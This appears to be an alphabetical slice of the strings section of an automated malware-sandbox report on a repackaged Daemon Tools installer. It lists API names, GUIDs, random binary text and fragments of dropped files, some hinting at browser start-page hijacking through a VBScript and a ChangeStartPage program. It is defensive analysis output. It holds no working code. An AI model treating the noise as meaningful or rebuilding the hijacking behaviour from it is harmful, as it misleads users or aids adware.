vHexCode

Ansi based on Dropped File (JSSys3.dll.204366558)

VHRUXJ;')

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

vInitDir

Ansi based on Dropped File (JSSys3.dll.204366558)

vInUse

Ansi based on Dropped File (JSSys3.dll.204366558)

Virtual

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

virtual function call

Unicode based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

VirtualAlloc

Ansi based on Dropped File (Tages.dll.423655889)

VirtualFree

Ansi based on Dropped File (Tages.dll.423655889)

Visual C++ CRT: Not enough memory to complete call to strerror.

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

vItem

Ansi based on Dropped File (JSSys3.dll.204366558)

vj0Z#L$VBu-

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

vj=D=dWrY

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

VjQsB0Fio

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

vKeyList

Ansi based on Dropped File (JSSys3.dll.204366558)

vKeyName

Ansi based on Dropped File (JSSys3.dll.204366558)

VLNLSlmiU

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Vn>3=1c1G

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

vNewName

Ansi based on Dropped File (JSSys3.dll.204366558)

vNumberProcs

Ansi based on Dropped File (JSSys3.dll.204366558)

vOSVersion

Ansi based on Dropped File (JSSys3.dll.204366558)

vOSVersionWW

Ansi based on Dropped File (JSSys3.dll.204366558)

VP^VKWTKKMKR]_<

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

vProcList

Ansi based on Dropped File (JSSys3.dll.204366558)

vProgID

Ansi based on Dropped File (JSSys3.dll.204366558)

vProgIDW

Ansi based on Dropped File (JSSys3.dll.204366558)

Vpuc"tu\oK

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

vqDAZS@F

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

VQXWMWTK\_]]s1

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

vRegPath

Ansi based on Dropped File (JSSys3.dll.204366558)

VS[T6T;6796-63-9

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

VS_VERSION_INFO

Unicode based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

vScreenHeight

Ansi based on Dropped File (JSSys3.dll.204366558)

vScreenWidth

Ansi based on Dropped File (JSSys3.dll.204366558)

vSection

Ansi based on Dropped File (JSSys3.dll.204366558)

vStyle

Ansi based on Dropped File (JSSys3.dll.204366558)

vStyleWW

Ansi based on Dropped File (JSSys3.dll.204366558)

vSubKeyName

Ansi based on Dropped File (JSSys3.dll.204366558)

vSubKeyNameW

Ansi based on Dropped File (JSSys3.dll.204366558)

vt_H6%

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

vText

Ansi based on Dropped File (JSSys3.dll.204366558)

vTextWWW

Ansi based on Dropped File (JSSys3.dll.204366558)

vTitle

Ansi based on Dropped File (JSSys3.dll.204366558)

vTitles

Ansi based on Dropped File (JSSys3.dll.204366558)

vTitlesW

Ansi based on Dropped File (JSSys3.dll.204366558)

vTotal

Ansi based on Dropped File (JSSys3.dll.204366558)

vType

Ansi based on Dropped File (JSSys3.dll.204366558)

VV^TMTTK9966769Z

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

VV^WMTT6NN6-9ZZ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

VV^WOTSKMNNZZ_

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

vValList

Ansi based on Dropped File (JSSys3.dll.204366558)

vValue

Ansi based on Dropped File (JSSys3.dll.204366558)

VVUQQQ00..Q

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

VVY5mfe:B

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

vWUJ-W]

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

vX-gm_SmC

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

V}E3}?fF,

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

v}IHCVo *

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

w"9~L ~M(

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

w%-3pvnZk^"

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

w-A5[</ZW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

W;K1:'q4[%

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

W>>{Vrht

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

W@q@9}Z|W

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

W\2=HNY'E

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

W]pajBo;p

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

w_*or~ _-(

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

WaitForSingleObject

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

WaitForThreadpoolTimerCallbacks

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

Wallpaper

Unicode based on Dropped File (JSSys3.dll.204366558)

WallpaperStyle

Unicode based on Dropped File (JSSys3.dll.204366558)

WantsAliasedNotifications

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

WantsFORDISPLAY

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

WantsFORPARSING

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

WantsParseDisplayName

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

WantsUniversalDelegate

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

WB,,j;{Mq

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

wCy~N;v.

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

WebView

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Wednesday

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

wf,"4GyJ<

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Wg,F`-Ge

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

WH2iW*}x

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

WideCharToMultiByte

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

WIN.INI

Unicode based on Dropped File (JSSys3.dll.204366558)

Window

Unicode based on Dropped File (JSSys3.dll.204366558)

WindowBackground

Unicode based on Dropped File (JSSys3.dll.204366558)

WindowBackText

Unicode based on Dropped File (JSSys3.dll.204366558)

Windows

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Windows Vista not supported.

Unicode based on Dropped File (JSSys3.dll.204366558)

WindowText

Unicode based on Dropped File (JSSys3.dll.204366558)

winmm.dll

Ansi based on Dropped File (JSSys3.dll.204366558)

With objFSO.OpenTextFile(strPrefsPath, ForAppending)

Ansi based on Dropped File (start72urez3kr.vbs)

With objFSO.OpenTextFile(strPrefsPath, ForReading)

Ansi based on Dropped File (start72urez3kr.vbs)

With objFSO.OpenTextFile(strPrefsPath, ForWriting)

Ansi based on Dropped File (start72urez3kr.vbs)

With objRegExp_HomePage

Ansi based on Dropped File (start72urez3kr.vbs)

wKzC<b

Ansi based on Dropped File (Uninstall.exe.212096218)

WLyTeo!\x_

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

WOOQPOcW`bof`

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Write a section with keys to INI file.

Ansi based on Dropped File (JSSys3.dll.204366558)

Write a section with keys to INI file.!

Ansi based on Dropped File (JSSys3.dll.204366558)

Write one INI value, delete an INI key or delete an INI section.

Ansi based on Dropped File (JSSys3.dll.204366558)

Write one INI value, delete an INI key or delete an INI section.WW&

Ansi based on Dropped File (JSSys3.dll.204366558)

Write String, X-Str, DWord or Binary value data to Registry. Key and value are created if nec.

Ansi based on Dropped File (JSSys3.dll.204366558)

Write String, X-Str, DWord or Binary value data to Registry. Key and value are created if nec.#

Ansi based on Dropped File (JSSys3.dll.204366558)

WriteConsoleW

Ansi based on Dropped File (imgengine.dll.62529018)

WriteFile

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

WriteIniSection

Ansi based on Dropped File (JSSys3.dll.204366558)

WriteIniVal

Ansi based on Dropped File (JSSys3.dll.204366558)

WritePrivateProfileSectionA

Ansi based on Dropped File (JSSys3.dll.204366558)

WritePrivateProfileStringA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

WritePrivateProfileStringW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

WriteProfileSectionA

Ansi based on Dropped File (JSSys3.dll.204366558)

WriteProfileStringA

Ansi based on Dropped File (JSSys3.dll.204366558)

wroMHu(n^

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

wscript.exe

Unicode based on Runtime Data (ChangeStartPage.exe )

WScript.Quit 0

Ansi based on Dropped File (start72urez3kr.vbs)

wsprintfA

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

wsprintfW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

WTVOB.*4HTYSQU

Ansi based on Dropped File (Uninstall.exe.212096218)

wVV.1H,+s$

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

WVWTM6T6666--3,,,,,,

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

WWPWWO\ebb

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

wwwwwwww

Ansi based on Memory/File Scan (HiRu.exe , 00044045-00000600.00000000.44546.00445000.00000002.mdmp)

wwwwwwwww

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

wwwwwwwwww

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

wwwwwwwwwww

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

wwwwwwwwwwww

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

wwwwwwwwwwwwwww

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

wwwwwwwwwwwwx

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

wwwwwwwxp

Ansi based on Memory/File Scan (HiRu.exe , 00044045-00000600.00000000.44546.00445000.00000002.mdmp)

wwwwwx`

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

wwwwwxxxgwww

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

wwwxwwwwww

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

wxf@dfdffFf

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

WxFq2wOaG

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

wxwwxxwwxxxw

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

wxwxxwxxx

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

wxxwwwwww

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

wY;pP[nFR

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

WY^#$5+/I

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

WzdJ#zsqv2

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

X '9IED`Y

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

X @v<gzh.)|

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

X#!QovD0oq

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

X$0B2ajj^ESS

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

X(o'-, E

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

X*(1_(7y!

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

X42r3F++&!

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

x9!)qwVu

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

x=30s]V/S

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

x>[2)+JZYO

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

x]=!c"& `

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

X_txmt#

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

xBVqqEhI)

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Xc~nrB:b|y{

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

XdG^8(vG$A

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

xDzMXqIU%s

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

xF_?:D`0vL

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

XIGetCurUserWW

Ansi based on Dropped File (JSSys3.dll.204366558)

xlO9+

Ansi based on Dropped File (Tages.dll.423655889)

xnFS)1:R)

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

XPresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

XQ6TU?2M[

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

xStyle #

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

xtGxx}

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Xtm5=8M

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

XTNMSXYXX

Ansi based on Dropped File (Uninstall.exe.212096218)

xttx55=2/22..

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

xuKDF`2E2:

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

xv''adFq7

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

XV^XSSUKK86664,,3,,,,,3

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

xVn eu^v

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

xvValList

Ansi based on Dropped File (JSSys3.dll.204366558)

xwpww

Ansi based on Dropped File (Uninstall.exe.212096218)

xwwwwwwwwwwwxfg

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

xwwwxwxgw

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

XXUSSS8883333,+++++

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

XXVSVSMM866633,,,+,,+++,3

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

xxwwwwwwwwwww

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

xxwxwwwww

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

x|}HDyyDAAD?A@?A@?@@??@??@AC

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

X}i_a03]vxK

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

X~?gSkz]y

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Y z=P\,J#

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Y%HvdH!JJ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

y&xMK[-%$z

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Y'}f|tl

Ansi based on Dropped File (imgengine.dll.62529018)

y+@OYq2`L^

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

y, J

Ansi based on Dropped File (Uninstall.exe.212096218)

Y.j46!Au-|\

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

y.ytj\qj=;

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Y6s`H\"x0

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

y\A`o$&fA/

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

y_jy^2;<7

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Y_MTe

Ansi based on Image Processing (screen_4.png)

Y_ndna8mb

Ansi based on Image Processing (screen_4.png)

yAaneHa8Mene_8_Mee_AepmMMb_M.0_

Ansi based on Image Processing (screen_4.png)

YAj?G\kgC>

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

yC"zf<yw{

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

yc&wTYmAC

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

yC6{LGUz!

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

YDIv3Bv}M

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

yJyCJACA@BA@@@@?@@?@@@AC

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

YL6--KKKOOMPWPboej

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Yl`'o8Ymv

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

yn,Ho,,,

Ansi based on Image Processing (screen_7.png)

yn,Ho,,,b

Ansi based on Image Processing (screen_4.png)

YnaH08MT

Ansi based on Image Processing (screen_4.png)

YnaH08MTb

Ansi based on Image Processing (screen_4.png)

ynaHo__aDAEmo_Too__u_ra

Ansi based on Image Processing (screen_4.png)

YP]S'\

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Yq1zv|No+

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

yql'[J

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

YRR77NNKTYM^

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

yul9%V

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

YvLen'

Ansi based on Dropped File (JSSys3.dll.204366558)

ywV/6MqpjH

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

yX(Ywci+5@:

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Yya3aHHY_

Ansi based on Image Processing (screen_4.png)

yzQg"!LRle

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

y~{yIzzCCCCBCBBBB@@%@@BC~%

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

z!Y4$:HWPb

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Z,u7_K+H

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Z/W'I$ U

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

z;\hzcH_`K

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

z=M7[=Uk_

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Z?!uU"]^

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

z_Pt1C'{9=

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ZA;Y2I6W

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

zB8$JQM%mv

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

zD.y4ZcDS

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ZDUe6P|o8

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

zF#&vjb-J

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ZH4nEN[Lm5=

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ZI?xpC}#1

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

zICIIIIzzIz~~y

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

zIwIIIIIIIIIIy~y~~}~

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

zIwwIwzwzzzzz

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Zl@#^ldPR

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

zqav9fZ2

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ZR+K#r.Z

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ZrWrKKtDm

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ZW c2>JXR

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

zwwwwwwvuuuuuww

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

zwwwwwwwwzzzzz

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

zwwwwzwIzzzzzz~{~~

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

zzICIwCIzIIzzy~~~|

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

zz{{z{{CCwCCuuBBuBBuuCw

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Z~FVn.V<RJ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

{#G]pEUDJ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

{%.0Wl2~JX|zf

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

{'-MefPLC

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

{00020424-0000-0000-C000-000000000046}

Unicode based on Runtime Data (DiscSoftBusService.exe )

{031E4825-7B94-4DC3-B131-E946B44C8DD5}

Unicode based on Runtime Data (DiscSoftBusService.exe )

{04731B67-D933-450A-90E6-4ACD2E9408FE}

Unicode based on Runtime Data (DiscSoftBusService.exe )

{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}

Unicode based on Runtime Data (DiscSoftBusService.exe )

{0nAO4="Ah4

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

{11016101-E366-4D22-BC06-4ADA335C892B}

Unicode based on Runtime Data (DiscSoftBusService.exe )

{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}

Unicode based on Runtime Data (DiscSoftBusService.exe )

{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

{208D2C60-3AEA-1069-A2D7-08002B30309D}

Unicode based on Runtime Data (DiscSoftBusService.exe )

{20D04FE0-3AEA-1069-A2D8-08002B30309D}

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

{26EE0668-A00A-44D7-9371-BEB064C98683}

Unicode based on Runtime Data (DiscSoftBusService.exe )

{28636AA6-953D-11D2-B5D6-00C04FD918D0} 6

Unicode based on Runtime Data (ChangeStartPage.exe )

{374DE290-123F-4565-9164-39C4925E467B}

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

{3D644C9B-1FB8-4F30-9B45-F670235F79C0}

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

{3Lv@9VL

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

{4336A54D-038B-4685-AB02-99BB52D3FB8B}

Unicode based on Runtime Data (DiscSoftBusService.exe )

{450D8FBA-AD25-11D0-98A8-0800361B1103}

Unicode based on Runtime Data (DiscSoftBusService.exe )

